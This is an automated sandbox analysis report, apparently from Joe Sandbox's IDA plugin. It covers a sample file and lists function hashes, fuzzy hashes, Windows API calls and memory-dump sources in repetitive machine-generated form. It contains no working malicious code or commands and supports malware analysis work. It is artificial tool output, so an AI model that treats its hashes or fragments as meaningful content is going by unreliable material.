                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: 5bcaca4f340a27315289c114546c8db8554525e13d208e882763155d72a9493b
                                                                                              • Instruction ID: 3d23f4739b777a251b9215c455d30fc3f88e107489475b72b4d60f890650568d
                                                                                              • Opcode Fuzzy Hash: 5bcaca4f340a27315289c114546c8db8554525e13d208e882763155d72a9493b
                                                                                              • Instruction Fuzzy Hash: 24015A75140308BAD710DBE5EC45F9B77BCFF19715F009422FA04A7190E370A956CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00A27886,?,00000400), ref: 00A27727
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A27748
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 5708e9b08af272384d495e2d2ec49ecfb2f63406a550f218db05cd691d4a4692
                                                                                              • Instruction ID: e701e42dc198d79b024537fb9a426a5b383473160943f0bb938470a1cc0105ee
                                                                                              • Opcode Fuzzy Hash: 5708e9b08af272384d495e2d2ec49ecfb2f63406a550f218db05cd691d4a4692
                                                                                              • Instruction Fuzzy Hash: D7D0A731348300BBF6100B706C06F1F3B597B04B42F20C0147709D40E0D6749051A714
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A52BAF,?,?,00000008,?,?,00A5284F,00000000), ref: 00A52DE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 10aace02d79ae6b9dbff5dcc281427f332ef2e7b8752bf26bacb5aed9edcf29d
                                                                                              • Instruction ID: 58071f283f7344e4c8dff09da2ed76f510138994c38bc5c8c94e89a1e233bc47
                                                                                              • Opcode Fuzzy Hash: 10aace02d79ae6b9dbff5dcc281427f332ef2e7b8752bf26bacb5aed9edcf29d
                                                                                              • Instruction Fuzzy Hash: 43B11D326106099FD715CF28C486B657BF0FF46366F258658EC99CF2A1C335E995CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A4083C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 4da96f101b1b4e925af7d276d87e112110c54a1001aaa4ca280abb470bfadf76
                                                                                              • Instruction ID: 91530ebc4c9b4ed9dcbbc23097e63f342066683b865a91ff572b969a4b35c0b3
                                                                                              • Opcode Fuzzy Hash: 4da96f101b1b4e925af7d276d87e112110c54a1001aaa4ca280abb470bfadf76
                                                                                              • Instruction Fuzzy Hash: F3519EB6A01605CFEB14CFA8D981BAEBBF0FB88304F24856AC511EB261D3749941DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00A2C388
                                                                                                • Part of subcall function 00A2C3F7: __EH_prolog.LIBCMT ref: 00A2C3FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prologVersion
                                                                                              • String ID:
                                                                                              • API String ID: 1836448879-0
                                                                                              • Opcode ID: 6ef6c89ce3d2eb42efdde5ca72220397e15eb0d1ae0d763df93a94667dcf16fc
                                                                                              • Instruction ID: c1f9a2d06807dfc0bf491333df9efc5d5461df7c0fcb69222141e0c7e5a614e2
                                                                                              • Opcode Fuzzy Hash: 6ef6c89ce3d2eb42efdde5ca72220397e15eb0d1ae0d763df93a94667dcf16fc
                                                                                              • Instruction Fuzzy Hash: 03F082309042A88ADF25DB68B80A3DCBBF55B11729F0488E5C1805A192C2F586CBDF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: 8b458404b25e1c33caffb322e86de50759b32c8e1d057f5151f8d609f2e0b862
                                                                                              • Instruction ID: 95d33896779235b3065ad2e64dbea2227a1bb8ae175577e1261a7584cc0b496d
                                                                                              • Opcode Fuzzy Hash: 8b458404b25e1c33caffb322e86de50759b32c8e1d057f5151f8d609f2e0b862
                                                                                              • Instruction Fuzzy Hash: 08C137B2A183818FD754CF29D88065AFBE1BFCD208F19892DE998D7301D734A945CB96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020BB0,00A40605), ref: 00A40BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 8ddddd8faf264743b37d0d418df8722897d1fe0c9e37250081b34b88193d8ff4
                                                                                              • Instruction ID: 9dfd23c5dd7609ff6bf66eaae4c196ff1232bd4ccb216aa1b7c94f3a6f5da254
                                                                                              • Opcode Fuzzy Hash: 8ddddd8faf264743b37d0d418df8722897d1fe0c9e37250081b34b88193d8ff4
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: ab79867a7da1e983a88ef4745cc1c75d7c51f8252e1971a95b318ebdc82ce8f0
                                                                                              • Instruction ID: c11a4963f740164bcf49be394f667bc5d2a3a8a029d99684879e9abf9c5b9e72
                                                                                              • Opcode Fuzzy Hash: ab79867a7da1e983a88ef4745cc1c75d7c51f8252e1971a95b318ebdc82ce8f0
                                                                                              • Instruction Fuzzy Hash: ECA011B0202202CB8300CFB2AA082083AA8BA0A2823008028A088C0220FB2080A28B02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 49c86cf5dfd120552ca6a330adbc3208c23189e3a77a00f43a99fa3c4c682a92
                                                                                              • Instruction ID: 489eef7311c5ee815f852d95eb6f1fc782afc3cdb34fefe77fb9d2409a315a97
                                                                                              • Opcode Fuzzy Hash: 49c86cf5dfd120552ca6a330adbc3208c23189e3a77a00f43a99fa3c4c682a92
                                                                                              • Instruction Fuzzy Hash: 9662D6B1608B859FCB39CF38C5906BDBBE1AF95304F18856DF99A8B342D734A945CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a99e5591819f93bed0ea4b7cda3a5de53e9357d52e2d772d63c253c1e4b53f2a
                                                                                              • Instruction ID: 240da152286176a960452a53cf2a56d6723aec17224b7ef2e55da9fe895b9075
                                                                                              • Opcode Fuzzy Hash: a99e5591819f93bed0ea4b7cda3a5de53e9357d52e2d772d63c253c1e4b53f2a
                                                                                              • Instruction Fuzzy Hash: 3B62E371A083459FCB18CF28C5906B9BBE1BF95304F18866DFC998B346DB38E945CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfbf6881d0393643dd25d5cfa1cce131a79b466a846340052269a16c1008f441
                                                                                              • Instruction ID: 7f6fd0d863ec4daf2875b2a854f1d824d9ed2fd14565c9489c710de8697eb920
                                                                                              • Opcode Fuzzy Hash: dfbf6881d0393643dd25d5cfa1cce131a79b466a846340052269a16c1008f441
                                                                                              • Instruction Fuzzy Hash: 19524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f787c4ce50420d944c97ccf420451591fb7dea7718ebf0059b484a6d7d441889
                                                                                              • Instruction ID: 3b59df67d61f358fa44330edd0fecb38e2fb9fa561006eaaf8652c21e597e31b
                                                                                              • Opcode Fuzzy Hash: f787c4ce50420d944c97ccf420451591fb7dea7718ebf0059b484a6d7d441889
                                                                                              • Instruction Fuzzy Hash: 3512D1B16047468FC728CF28C9917B9B7E1FB44304F14892EF99BC7680EB78A995CB45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e8dadc7f591174714af29e43b2b1c22fa64176d11ce3ea3ff4f7026e8c90858
                                                                                              • Instruction ID: f2fd0c43188a71b05e20b521255e8cfc05154874ede630b57469e3ddaf551a89
                                                                                              • Opcode Fuzzy Hash: 1e8dadc7f591174714af29e43b2b1c22fa64176d11ce3ea3ff4f7026e8c90858
                                                                                              • Instruction Fuzzy Hash: 83F1A7716093618FC718CF2CE584A2ABBE5EFC9364F144A2EE4C5DB252D631E946CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: f699d9907af1ca96ce3de7e22743596b8bfb97c07d7e08e0a29c7cd9df5e5d03
                                                                                              • Instruction ID: 7e27899b765378e86195245ee1d9ea0ee4b53cc330402eec18a38b693a4e126e
                                                                                              • Opcode Fuzzy Hash: f699d9907af1ca96ce3de7e22743596b8bfb97c07d7e08e0a29c7cd9df5e5d03
                                                                                              • Instruction Fuzzy Hash: 55D194B1A083418FDB24DF28C98475BBBE1BF89308F04466DF8899B242D774E945CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf680b9f1244563d1736b2f75648be11fd097450f8faa89cd99a43d5d1db73cf
                                                                                              • Instruction ID: 805699e0df239dcda8c5369ce757b92bc3292b4870ac1399f5bbca80a0208a71
                                                                                              • Opcode Fuzzy Hash: cf680b9f1244563d1736b2f75648be11fd097450f8faa89cd99a43d5d1db73cf
                                                                                              • Instruction Fuzzy Hash: 3BE16C7551C3908FC304CF59D89056ABBF0BB9A700F4A0A5EF9C587352C739EA16DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fbc3703b16c3aae3db15c4d448ff6b4734694cd092f9e90ebe0c6dc9e479c305
                                                                                              • Instruction ID: 727a5c733fde75941316a20173952fa837a7cf6d052cfd849f33f4bf9d91b0e3
                                                                                              • Opcode Fuzzy Hash: fbc3703b16c3aae3db15c4d448ff6b4734694cd092f9e90ebe0c6dc9e479c305
                                                                                              • Instruction Fuzzy Hash: 939157B0A00B459BD724EF7CD991BBA77D5EB94300F10092DF59687282EB74E584C751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 931725267d3afae2a79d0ebb937372447d19929da5c01f319e552610ee085862
                                                                                              • Instruction ID: 32426702bc92b6ceb99560031651154caae9caa2d4c02eb05b46ee536ee3c058
                                                                                              • Opcode Fuzzy Hash: 931725267d3afae2a79d0ebb937372447d19929da5c01f319e552610ee085862
                                                                                              • Instruction Fuzzy Hash: D3812571B04B419FEB24DB7CD982BBE37D5ABA4304F140D3DF9868B282DB7098858761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ffbd74cf56ef2c7d8391022c16a09d964bf19f3bcbea992242fae6d3e84d7ecb
                                                                                              • Instruction ID: eb7ecb6d6f29c210e19370c51ee49a596bcc6545dea694abcc59c5d3d48b31cb
                                                                                              • Opcode Fuzzy Hash: ffbd74cf56ef2c7d8391022c16a09d964bf19f3bcbea992242fae6d3e84d7ecb
                                                                                              • Instruction Fuzzy Hash: A5617DBD70070466DF3C5B689995BBEB3A9DFC3744F20081AE843DF185E651DD868217
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
